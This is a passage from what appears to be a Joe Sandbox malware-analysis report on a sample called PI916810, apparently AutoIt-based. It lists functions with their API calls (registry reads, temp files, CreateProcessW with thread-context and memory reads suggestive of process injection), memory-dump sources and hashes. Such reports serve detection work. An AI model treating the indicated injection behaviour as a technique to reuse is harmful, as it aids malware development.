                                                                                                                                                                            • Instruction Fuzzy Hash: F5916F71910219EFCF04EFA6CC919EDBBB4BF15318F14442FE815AB291EB38A905CB59
                                                                                                                                                                            Function 004635B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004635A1,SwapMouseButtons,00000004,?), ref: 004635D4
                                                                                                                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,004635A1,SwapMouseButtons,00000004,?,?,?,?,00462754), ref: 004635F5
                                                                                                                                                                            • RegCloseKey.KERNELBASE(00000000,?,?,004635A1,SwapMouseButtons,00000004,?,?,?,?,00462754), ref: 00463617
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                                                            • String ID: Control Panel\Mouse
                                                                                                                                                                            • API String ID: 3677997916-824357125
                                                                                                                                                                            • Opcode ID: ecea770bfdaa7d2c7e814dd0f94a1b571b02000fbd1129c9d05368ef14f633d9
                                                                                                                                                                            • Instruction ID: 80c436725155f16245ee778f61b4ef95944c823f368955214ab9e54224ec0470
                                                                                                                                                                            • Opcode Fuzzy Hash: ecea770bfdaa7d2c7e814dd0f94a1b571b02000fbd1129c9d05368ef14f633d9
                                                                                                                                                                            • Instruction Fuzzy Hash: B7115A71510258BFDB20CF64DC80DAFB7B8EF05741F00456AF805DB210E2719F449769
                                                                                                                                                                            Function 010FC970 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 010FD12B
                                                                                                                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 010FD1C1
                                                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010FD1E3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2042218501.00000000010FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 010FB000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_10fb000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2438371351-0
                                                                                                                                                                            • Opcode ID: f7a3111ab7015fd8b62422fe8fc399687c9bf18e9b49b2a513bdf356eeec8a8c
                                                                                                                                                                            • Instruction ID: 4b1acb27b6ffbbd558985ad8ef175e7c5d208b8290fa8a33a301851d368a3a98
                                                                                                                                                                            • Opcode Fuzzy Hash: f7a3111ab7015fd8b62422fe8fc399687c9bf18e9b49b2a513bdf356eeec8a8c
                                                                                                                                                                            • Instruction Fuzzy Hash: 52621C30A14258DBEB24CFA4C841BDEB772EF58300F1091A9D24DEB794E7799E81CB59
                                                                                                                                                                            Function 004C97E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00465045: _fseek.LIBCMT ref: 0046505D
                                                                                                                                                                              • Part of subcall function 004C99BE: _wcscmp.LIBCMT ref: 004C9AAE
                                                                                                                                                                              • Part of subcall function 004C99BE: _wcscmp.LIBCMT ref: 004C9AC1
                                                                                                                                                                            • _free.LIBCMT ref: 004C992C
                                                                                                                                                                            • _free.LIBCMT ref: 004C9933
                                                                                                                                                                            • _free.LIBCMT ref: 004C999E
                                                                                                                                                                              • Part of subcall function 00482F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00489C64), ref: 00482FA9
                                                                                                                                                                              • Part of subcall function 00482F95: GetLastError.KERNEL32(00000000,?,00489C64), ref: 00482FBB
                                                                                                                                                                            • _free.LIBCMT ref: 004C99A6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1552873950-0
                                                                                                                                                                            • Opcode ID: 922d4df5b64e1696f8af207ae7c752e1e6b30532c460fe4269bae0bb53f03174
                                                                                                                                                                            • Instruction ID: 0729db0d97bbb50b6f8a1ac599990ff3053ca13b69932034d19d6d09209a3abc
                                                                                                                                                                            • Opcode Fuzzy Hash: 922d4df5b64e1696f8af207ae7c752e1e6b30532c460fe4269bae0bb53f03174
                                                                                                                                                                            • Instruction Fuzzy Hash: AC515CB5A04218AFDF249F65CC85A9EBBB9EF48304F0004AEB609A7241DB755E80CF59
                                                                                                                                                                            Function 0048493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2782032738-0
                                                                                                                                                                            • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                                                                                                                                            • Instruction ID: 39bea72cd495b48ab28e4bfa21d1c12dc7ede143a45b3e8b19d5178e56e04c37
                                                                                                                                                                            • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                                                                                                                                            • Instruction Fuzzy Hash: 9B41C5B0A006079BDB2CEEB9C88096F77A9EFC1364B24896FE8558B740D7789D41874C
                                                                                                                                                                            Function 00464DD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memmove
                                                                                                                                                                            • String ID: AU3!P/O$EA06
                                                                                                                                                                            • API String ID: 4104443479-2756084753
                                                                                                                                                                            • Opcode ID: 3b02af6da6bdfacb3b2fbea91d61ec133972bde02f7f1b66f699da3792269b22
                                                                                                                                                                            • Instruction ID: ffb702374604ef194c7b0c49f94005bf1853b1647b07a0978d4ea880466d055c
                                                                                                                                                                            • Opcode Fuzzy Hash: 3b02af6da6bdfacb3b2fbea91d61ec133972bde02f7f1b66f699da3792269b22
                                                                                                                                                                            • Instruction Fuzzy Hash: E9416C71A04254ABCF215B64C8517BF7F66AB81304F28447BFC429A282F52E9D41C7AB
                                                                                                                                                                            Function 004673E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 0049EE62
                                                                                                                                                                            • GetOpenFileNameW.COMDLG32(?), ref: 0049EEAC
                                                                                                                                                                              • Part of subcall function 004648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004648A1,?,?,004637C0,?), ref: 004648CE
                                                                                                                                                                              • Part of subcall function 004809D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004809F4
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                                                                            • String ID: X
                                                                                                                                                                            • API String ID: 3777226403-3081909835
                                                                                                                                                                            • Opcode ID: f00dd1b3bcddc4b8b16ddd562a7a02faf6d955bee9111d5ed42a617fbc76a687
                                                                                                                                                                            • Instruction ID: 8cc8915424f746d48afd2840481bc2e068e37f8d8be118732bd02168fcfc026a
                                                                                                                                                                            • Opcode Fuzzy Hash: f00dd1b3bcddc4b8b16ddd562a7a02faf6d955bee9111d5ed42a617fbc76a687
                                                                                                                                                                            • Instruction Fuzzy Hash: FC21D870A102589BDF11DF95C845BEE7BF8AF49318F00401BE408E7341EBB8598E8FA6
                                                                                                                                                                            Function 004C901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __fread_nolock_memmove
                                                                                                                                                                            • String ID: EA06
                                                                                                                                                                            • API String ID: 1988441806-3962188686
                                                                                                                                                                            • Opcode ID: 2766ff42a3efcd0334871c3d71733419afafe9a9ba2befa4f246ba45551c8ed9
                                                                                                                                                                            • Instruction ID: 363aecba398ce4d65f09292793c6acfaa1359ef937c3b33f095b64f81d233514
                                                                                                                                                                            • Opcode Fuzzy Hash: 2766ff42a3efcd0334871c3d71733419afafe9a9ba2befa4f246ba45551c8ed9
                                                                                                                                                                            • Instruction Fuzzy Hash: 4801F971804218BEDB68D7A9CC1AFFE7BFCDB01305F00459FF552D2181E5B9AA188764
                                                                                                                                                                            Function 004C9B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 004C9B82
                                                                                                                                                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 004C9B99
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Temp$FileNamePath
                                                                                                                                                                            • String ID: aut
                                                                                                                                                                            • API String ID: 3285503233-3010740371
                                                                                                                                                                            • Opcode ID: 0ed6f544afcd4ee497520652e78b8b4b21c078dd9604ea12c3ed960686ae5552
                                                                                                                                                                            • Instruction ID: dc112648dc979613f79cbbe3a8f7e1b72099fb9b6ce81e40a92b623272138840
                                                                                                                                                                            • Opcode Fuzzy Hash: 0ed6f544afcd4ee497520652e78b8b4b21c078dd9604ea12c3ed960686ae5552
                                                                                                                                                                            • Instruction Fuzzy Hash: 54D05E7994030DABDB109B94DC4EFDA7B2CE704700F0042F1BF54990A2DEB565988B96
                                                                                                                                                                            Function 004DCDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 943828058d4438776844c0ecc04fe803ea845e59cf8fddbe88ee1938d08a11e2
                                                                                                                                                                            • Instruction ID: 8fc6f66f0280e24900d079149896ae9e36598a9b5264bc3181bd5ec21f2c1ba5
                                                                                                                                                                            • Opcode Fuzzy Hash: 943828058d4438776844c0ecc04fe803ea845e59cf8fddbe88ee1938d08a11e2
                                                                                                                                                                            • Instruction Fuzzy Hash: 33F16970A083019FC714DF29C490A6ABBE5FF88318F14896EF8999B351D735E946CF86
                                                                                                                                                                            Function 0048594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __FF_MSGBANNER.LIBCMT ref: 00485963
                                                                                                                                                                              • Part of subcall function 0048A3AB: __NMSG_WRITE.LIBCMT ref: 0048A3D2
                                                                                                                                                                              • Part of subcall function 0048A3AB: __NMSG_WRITE.LIBCMT ref: 0048A3DC
                                                                                                                                                                            • __NMSG_WRITE.LIBCMT ref: 0048596A
                                                                                                                                                                              • Part of subcall function 0048A408: GetModuleFileNameW.KERNEL32(00000000,005243BA,00000104,?,00000001,00000000), ref: 0048A49A
                                                                                                                                                                              • Part of subcall function 0048A408: ___crtMessageBoxW.LIBCMT ref: 0048A548
                                                                                                                                                                              • Part of subcall function 004832DF: ___crtCorExitProcess.LIBCMT ref: 004832E5
                                                                                                                                                                              • Part of subcall function 004832DF: ExitProcess.KERNEL32 ref: 004832EE
                                                                                                                                                                              • Part of subcall function 00488D68: __getptd_noexit.LIBCMT ref: 00488D68
                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00D20000,00000000,00000001,00000000,?,?,?,00481013,?), ref: 0048598F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1372826849-0
                                                                                                                                                                            • Opcode ID: b0e5002bd3c0f41f153c914a04d4f9a234de9b43fa45580063c3ec8f0e199a57
                                                                                                                                                                            • Instruction ID: eb3ff6c190035e15594b170229f38c41e0aada9686afcef5478957b11bbc8361
                                                                                                                                                                            • Opcode Fuzzy Hash: b0e5002bd3c0f41f153c914a04d4f9a234de9b43fa45580063c3ec8f0e199a57
                                                                                                                                                                            • Instruction Fuzzy Hash: 8A01F5B5200B15EEE6217B26DC42A2E72988F52B75F500C2FF4019A2C1DE7C9D029BAD
                                                                                                                                                                            Function 004C9B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,004C97D2,?,?,?,?,?,00000004), ref: 004C9B45
                                                                                                                                                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,004C97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004C9B5B
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,004C97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004C9B62
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$CloseCreateHandleTime
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3397143404-0
                                                                                                                                                                            • Opcode ID: 6531ffcaab349f09b4f22ccc3169661146cfc4886c9928716e1b97a6cf5ca92e
                                                                                                                                                                            • Instruction ID: eb3baa9a97f6481a73b836381eab82f1ae0f9663b8c6522aca0383d355c6aef2
                                                                                                                                                                            • Opcode Fuzzy Hash: 6531ffcaab349f09b4f22ccc3169661146cfc4886c9928716e1b97a6cf5ca92e
                                                                                                                                                                            • Instruction Fuzzy Hash: 0DE08632580218B7D7211B54EC49FCA7B28AB05761F108130FB146D0E187B12D15979C
                                                                                                                                                                            Function 004C8F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _free.LIBCMT ref: 004C8FA5
                                                                                                                                                                              • Part of subcall function 00482F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00489C64), ref: 00482FA9
                                                                                                                                                                              • Part of subcall function 00482F95: GetLastError.KERNEL32(00000000,?,00489C64), ref: 00482FBB
                                                                                                                                                                            • _free.LIBCMT ref: 004C8FB6
                                                                                                                                                                            • _free.LIBCMT ref: 004C8FC8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                            • Opcode ID: 180ac2cc07007adee99720b26c657bf09b4177bae862674a470a9d0e5fc62c6e
                                                                                                                                                                            • Instruction ID: 38b5d1a7a5e0c8f73fc5703bd67f6bbc80313cf43ba1e9251dfb7e89539744d2
                                                                                                                                                                            • Opcode Fuzzy Hash: 180ac2cc07007adee99720b26c657bf09b4177bae862674a470a9d0e5fc62c6e
                                                                                                                                                                            • Instruction Fuzzy Hash: A0E0C2B12087104ACA20B639AE00F9717EE0F88318B180C1FB609DB242CE6CE840D22C
                                                                                                                                                                            Function 0046AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: CALL
                                                                                                                                                                            • API String ID: 0-4196123274
                                                                                                                                                                            • Opcode ID: 31aa9e4889dcdcf3c3df9682763b59c4d184a2034dd79bd34cfb7d5fe646a3ef
                                                                                                                                                                            • Instruction ID: b5b2e1fce57fb9082b6e2499290ecf7591199f07b687987683d436dffb1ca340
                                                                                                                                                                            • Opcode Fuzzy Hash: 31aa9e4889dcdcf3c3df9682763b59c4d184a2034dd79bd34cfb7d5fe646a3ef
                                                                                                                                                                            • Instruction Fuzzy Hash: 2B2228706087418FC724DF14C494A6ABBE1FF45304F14895EE8869B362E739EC95CB8B
                                                                                                                                                                            Function 0046C6DA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcscmp
                                                                                                                                                                            • String ID: F
                                                                                                                                                                            • API String ID: 856254489-1304234792
                                                                                                                                                                            • Opcode ID: 9cb88a17e218a6640cdab78b6beb6648fa1ee7163d4395e5da3924162832b2e8
                                                                                                                                                                            • Instruction ID: aa13dd31e0d91103652b7c1f26624ee52bac24bd7d9743be63f6a862d22aebc3
                                                                                                                                                                            • Opcode Fuzzy Hash: 9cb88a17e218a6640cdab78b6beb6648fa1ee7163d4395e5da3924162832b2e8
                                                                                                                                                                            • Instruction Fuzzy Hash: EF0104718082855FD7119B2988D06EAFF74DF67364F19809FD8849B2A1F2388C42CF8A
                                                                                                                                                                            Function 0046492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
